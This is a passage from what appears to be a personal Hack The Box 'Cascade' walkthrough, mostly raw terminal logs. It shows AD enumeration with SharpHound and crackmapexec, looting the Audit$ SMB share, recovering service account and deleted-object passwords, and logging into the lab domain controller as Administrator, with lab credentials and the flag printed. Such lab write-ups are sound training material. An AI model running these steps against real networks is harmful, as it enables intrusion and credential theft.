appveyor.yml            Ingestors             package-lock.json  webpack.config.development.js
BloodHoundExampleDB.db  LICENSE-3RD-PARTY.md  README.md          webpack.config.production.js
deploy.sh               LICENSE.md            renderer.js
docs                    main.js               server.js
index.html              package.json          src
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5]
└─$ cd Ingestors       
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ ls
DebugBuilds  SharpHound.exe  SharpHound.ps1
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SSharpHound.exe /home/kali/HTB/cascade
cp: cannot stat 'SSharpHound.exe': No such file or directory
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ cp SharpHound.exe /home/kali/HTB/cascade 
                                                                                                  
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]

upload sharphound to our machine and run it and the download the zip back to kali

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p   sT333ve2
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> upload /home/kali/HTB/cascade/SharpHound.exe
                                        
Info: Uploading /home/kali/HTB/cascade/SharpHound.exe to C:\Users\s.smith\Documents\SharpHound.exe
                                        
Data: 1111380 bytes of 1111380 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents> ls


    Directory: C:\Users\s.smith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2023  12:51 AM         833536 SharpHound.exe


*Evil-WinRM* PS C:\Users\s.smith\Documents> ./SharpHound.exe
------------------------------------------------
Initializing SharpHound at 12:55 AM on 9/13/2023
------------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain CASCADE.LOCAL using path CN=Schema,CN=Configuration,DC=CASCADE,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 18 MB RAM
Status: 81 objects finished (+81 Infinity)/s -- Using 26 MB RAM
Enumeration finished in 00:00:00.4488100
Compressing data to .\20230913005544_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 12:55 AM on 9/13/2023! Happy Graphing!

*Evil-WinRM* PS C:\Users\s.smith\Documents> ls


    Directory: C:\Users\s.smith\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/13/2023  12:55 AM           9940 20230913005544_BloodHound.zip
-a----        9/13/2023  12:55 AM          14433 OTJmMzFjYTUtNzc3NS00YWZjLWEyODgtYTY3MDg2YzBiNzgx.bin
-a----        9/13/2023  12:51 AM         833536 SharpHound.exe


*Evil-WinRM* PS C:\Users\s.smith\Documents> download 20230913005544_BloodHound.zip
                                        
Info: Downloading C:\Users\s.smith\Documents\20230913005544_BloodHound.zip to 20230913005544_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\s.smith\Documents> 

started neo4j and ran bloodhound and imported the zip

Going to try aclpwn and see if it gets anything

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ ~/.local/bin/aclpwn -f [email protected] -t cascade.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.182 -sp sT333ve2
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/cascade]

check what groups s.smith is in

*Evil-WinRM* PS C:\Users\s.smith\Documents> net user s.smith
User name                    s.smith
Full Name                    Steve Smith
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/28/2020 8:58:05 PM
Password expires             Never
Password changeable          1/28/2020 8:58:05 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 MapAuditDrive.vbs
User profile
Home directory
Last logon                   1/29/2020 12:26:39 AM

Logon hours allowed          All

Local Group Memberships      *Audit Share          *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Audit Share"
Alias name     Audit Share
Comment        \\Casc-DC1\Audit$

Members

-------------------------------------------------------------------------------
s.smith
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup IT
Alias name     IT
Comment

Members

-------------------------------------------------------------------------------
arksvc
r.thompson
s.smith
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> net localgroup "Remote Management Use"
net.exe : System error 1376 has occurred.
    + CategoryInfo          : NotSpecified: (System error 1376 has occurred.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

The specified local group does not exist.


use crackmap exec to get into the shares by s.smith


┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec smb 10.10.10.182 -u s.smith -p sT333ve2 --shares
SMB         10.10.10.182    445    CASC-DC1         [*] Windows 6.1 Build 7601 x64 (name:CASC-DC1) (domain:cascade.local) (signing:True) (SMBv1:False)
SMB         10.10.10.182    445    CASC-DC1         [+] cascade.local\s.smith:sT333ve2 
SMB         10.10.10.182    445    CASC-DC1         [+] Enumerated shares
SMB         10.10.10.182    445    CASC-DC1         Share           Permissions     Remark
SMB         10.10.10.182    445    CASC-DC1         -----           -----------     ------
SMB         10.10.10.182    445    CASC-DC1         ADMIN$                          Remote Admin
SMB         10.10.10.182    445    CASC-DC1         Audit$          READ            
SMB         10.10.10.182    445    CASC-DC1         C$                              Default share
SMB         10.10.10.182    445    CASC-DC1         Data            READ            
SMB         10.10.10.182    445    CASC-DC1         IPC$                            Remote IPC
SMB         10.10.10.182    445    CASC-DC1         NETLOGON        READ            Logon server share 
SMB         10.10.10.182    445    CASC-DC1         print$          READ            Printer Drivers
SMB         10.10.10.182    445    CASC-DC1         SYSVOL          READ            Logon server share 
                                                                                                           

We have read to audit. we try and get to it which we do and i have downloaded all the files to my kali

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ smbclient //10.10.10.182/Audit$ -U s.smith%sT333ve2
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 29 13:01:26 2020
  ..                                  D        0  Wed Jan 29 13:01:26 2020
  CascAudit.exe                      An    13312  Tue Jan 28 16:46:51 2020
  CascCrypto.dll                     An    12288  Wed Jan 29 13:00:20 2020
  DB                                  D        0  Tue Jan 28 16:40:59 2020
  RunAudit.bat                        A       45  Tue Jan 28 18:29:47 2020
  System.Data.SQLite.dll              A   363520  Sun Oct 27 02:38:36 2019
  System.Data.SQLite.EF6.dll          A   186880  Sun Oct 27 02:38:38 2019
  x64                                 D        0  Sun Jan 26 17:25:27 2020
  x86                                 D        0  Sun Jan 26 17:25:27 2020

                6553343 blocks of size 4096. 1625087 blocks available
smb: \> cd DB
smb: \DB\> ls
  .                                   D        0  Tue Jan 28 16:40:59 2020
  ..                                  D        0  Tue Jan 28 16:40:59 2020
  Audit.db                           An    24576  Tue Jan 28 16:39:24 2020

                6553343 blocks of size 4096. 1625087 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (11.9 KiloBytes/sec) (average 11.9 KiloBytes/sec)
smb: \DB\> get CascAudit.exe
NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \DB\CascAudit.exe
smb: \DB\> cd ../
smb: \> get CascAudit.exe
getting file \CascAudit.exe of size 13312 as CascAudit.exe (9.3 KiloBytes/sec) (average 10.8 KiloBytes/sec)
smb: \> get RunAudit.bat
getting file \RunAudit.bat of size 45 as RunAudit.bat (0.0 KiloBytes/sec) (average 7.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.dll
getting file \System.Data.SQLite.dll of size 363520 as System.Data.SQLite.dll (129.4 KiloBytes/sec) (average 50.3 KiloBytes/sec)
smb: \> get System.Data.SQLite.EF6.dll
getting file \System.Data.SQLite.EF6.dll of size 186880 as System.Data.SQLite.EF6.dll (37.8 KiloBytes/sec) (average 45.5 KiloBytes/sec)
smb: \> cd x64
smb: \x64\> ls
  .                                   D        0  Sun Jan 26 17:25:27 2020
  ..                                  D        0  Sun Jan 26 17:25:27 2020
  SQLite.Interop.dll                  A  1639936  Sun Oct 27 02:39:20 2019

                6553343 blocks of size 4096. 1624828 blocks available
smb: \x64\> get SQLite.Interop.dll
getting file \x64\SQLite.Interop.dll of size 1639936 as SQLite.Interop.dll (264.6 KiloBytes/sec) (average 116.5 KiloBytes/sec)
smb: \x64\> cd ../x86
smb: \x86\> ls
  .                                   D        0  Sun Jan 26 17:25:27 2020
  ..                                  D        0  Sun Jan 26 17:25:27 2020
  SQLite.Interop.dll                  A  1246720  Sun Oct 27 02:34:20 2019

                6553343 blocks of size 4096. 1624828 blocks available
smb: \x86\> 

Going to try reading the database and have asked chatGPT how 🙂

sudo apt update
sudo apt install sqlite3

sqlite3 audit.db

.tables

SELECT * FROM DeletedUserAudit;

└─$ sqlite3 Audit.db
SQLite version 3.42.0 2023-05-16 12:36:15
Enter ".help" for usage hints.
sqlite> .tables
DeletedUserAudit  Ldap              Misc            
sqlite> SELECT * FROM DeletedUserAudit;
6|test|Test
DEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d|CN=Test\0ADEL:ab073fb7-6d91-4fd1-b877-817b9e1b0e6d,CN=Deleted Objects,DC=cascade,DC=local
7|deleted|deleted guy
DEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef|CN=deleted guy\0ADEL:8cfe6d14-caba-4ec0-9d3e-28468d12deef,CN=Deleted Objects,DC=cascade,DC=local
9|TempAdmin|TempAdmin
DEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a|CN=TempAdmin\0ADEL:5ea231a1-5bb4-4917-b07a-75a57f4c188a,CN=Deleted Objects,DC=cascade,DC=local
sqlite> SELECT * FROM Ldap;
1|ArkSvc|BQO5l5Kj9MdErXx6Q6AGOw==|cascade.local
sqlite> SELECT * FROM Misc;
sqlite> 

``

we can check the groups that ArkSvc is in

```bash
└─$ evil-winrm -i 10.10.10.182 -u s.smith -p   sT333ve2
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\s.smith\Documents> net user ArkSvc
User name                    arksvc
Full Name                    ArkSvc
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/9/2020 5:18:20 PM
Password expires             Never
Password changeable          1/9/2020 5:18:20 PM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/29/2020 10:05:40 PM

Logon hours allowed          All

Local Group Memberships      *AD Recycle Bin       *IT
                             *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\s.smith\Documents> 

i asked chatGPT about this output

Based on the information provided, there are a few key points of interest regarding the ArkSvc user:

Local Group Memberships:

AD Recycle Bin: This is intriguing because if this user has rights to access the Active Directory (AD) Recycle Bin, they may be able to recover deleted AD objects. This could lead to potential privilege escalation or information disclosure vulnerabilities.

I asked chatGPT how to eneumerate further and tips from evil-winrm. But we first need the password

Load the Active Directory Module: — Import-Module ActiveDirectory

Enumerate the Deleted Objects: – Get-ADObject -Filter ‘isDeleted -eq $true -and name -ne “Deleted Objects”‘ -IncludeDeletedObjects -Property *

Restore a Deleted Object (if needed): –$deletedUser = Get-ADObject -Filter ‘SamAccountName -eq “desired_username”‘ -IncludeDeletedObjects
Restore-ADObject -Identity $deletedUser.ObjectGuid

how to read the dll via kali using dnspy- Tips from chatGPT

wget https://packages.microsoft.com/config/debian/10/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
sudo dpkg -i packages-microsoft-prod.deb
sudo apt-get update
sudo apt-get install -y apt-transport-https
sudo apt-get update
sudo apt-get install -y dotnet-sdk-3.1

Download and unzip dnspy — https://github.com/0xd4d/dnSpy/releases

unzip dnSpy-netcore-win64.zip

run dnspy

cd dnSpy-netcore-win64
dotnet dnSpy.dll

Strugled with the above but found the password can be decrypted with some custom script on the internet for this box. The password is w3lc0meFr31nd

we try and run the previous commands in evilwinr

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ evil-winrm -i 10.10.10.182 -u arksvc -p w3lc0meFr31nd
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\arksvc\Documents> Import-Module ActiveDirectory
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -Filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -IncludeDeletedObjects -Property *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/CASC-WS1
                                  DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
CN                              : CASC-WS1
                                  DEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe
codePage                        : 0
countryCode                     : 0
Created                         : 1/9/2020 7:30:19 PM
createTimeStamp                 : 1/9/2020 7:30:19 PM
Deleted                         : True
Description                     :
DisplayName                     :
DistinguishedName               : CN=CASC-WS1\0ADEL:6d97daa4-2e82-4946-a11e-f91fa18bfabe,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/17/2020 3:37:36 AM, 1/17/2020 12:14:04 AM, 1/9/2020 7:30:19 PM, 1/1/1601 12:04:17 AM}
instanceType                    : 4
isCriticalSystemObject          : False
isDeleted                       : True

At the bottom we can see the tempadmin account

accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : cascade.local/Deleted Objects/TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd                : YmFDVDNyMWFOMDBkbGVz
CN                              : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage                        : 0
countryCode                     : 0
Created                         : 1/27/2020 3:23:08 AM
createTimeStamp                 : 1/27/2020 3:23:08 AM
Deleted                         : True
Description                     :
DisplayName                     : TempAdmin
DistinguishedName               : CN=TempAdmin\0ADEL:f0cc344d-31e0-4866-bceb-a842791ca059,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData           : {1/27/2020 3:23:08 AM, 1/1/1601 12:00:00 AM}
givenName                       : TempAdmin
instanceType                    : 4
isDeleted                       : True
LastKnownParent                 : OU=Users,OU=UK,DC=cascade,DC=local
lastLogoff                      : 0
lastLogon                       : 0
logonCount                      : 0
Modified                        : 1/27/2020 3:24:34 AM
modifyTimeStamp                 : 1/27/2020 3:24:34 AM
msDS-LastKnownRDN               : TempAdmin
Name                            : TempAdmin
                                  DEL:f0cc344d-31e0-4866-bceb-a842791ca059
nTSecurityDescriptor            : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory                  :
ObjectClass                     : user
ObjectGUID                      : f0cc344d-31e0-4866-bceb-a842791ca059
objectSid                       : S-1-5-21-3332504370-1206983947-1165150453-1136
primaryGroupID                  : 513
ProtectedFromAccidentalDeletion : False
pwdLastSet                      : 132245689883479503
sAMAccountName                  : TempAdmin
sDRightsEffective               : 0
userAccountControl              : 66048
userPrincipalName               : [email protected]
uSNChanged                      : 237705
uSNCreated                      : 237695
whenChanged                     : 1/27/2020 3:24:34 AM
whenCreated                     : 1/27/2020 3:23:08 AM

we can see password – YmFDVDNyMWFOMDBkbGVz. we try to decode as base64

┌──(kali㉿kali)-[~]
└─$ echo "YmFDVDNyMWFOMDBkbGVz" | base64 -d
baCT3r1aN00dles                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ 

Because in the email there was mention that they share the same password with the administrato, we test the password

┌──(kali㉿kali)-[~/HTB/cascade]
└─$ crackmapexec winrm 10.10.10.182 -u Administrator -p baCT3r1aN00dles

SMB         10.10.10.182    5985   CASC-DC1         [*] Windows 6.1 Build 7601 (name:CASC-DC1) (domain:cascade.local)
HTTP        10.10.10.182    5985   CASC-DC1         [*] http://10.10.10.182:5985/wsman
WINRM       10.10.10.182    5985   CASC-DC1         [+] cascade.local\Administrator:baCT3r1aN00dles (Pwn3d!)
                                                                                                                

pawned

d-r---        1/28/2020   6:26 PM                Documents
d-r---        1/26/2020  11:56 PM                Downloads
d-r---        1/26/2020  11:56 PM                Favorites
d-r---        1/26/2020  11:56 PM                Links
d-r---        1/26/2020  11:56 PM                Music
d-r---        1/26/2020  11:56 PM                Pictures
d-r---        1/26/2020  11:56 PM                Saved Games
d-r---        1/26/2020  11:56 PM                Searches
d-r---        1/26/2020  11:56 PM                Videos
-a----        3/25/2020  11:17 AM         645729 wds_current_setup.exe


*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/13/2023  12:27 AM             34 root.txt


c*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
e9f7e5fccd0b570fffadd6190b3282f4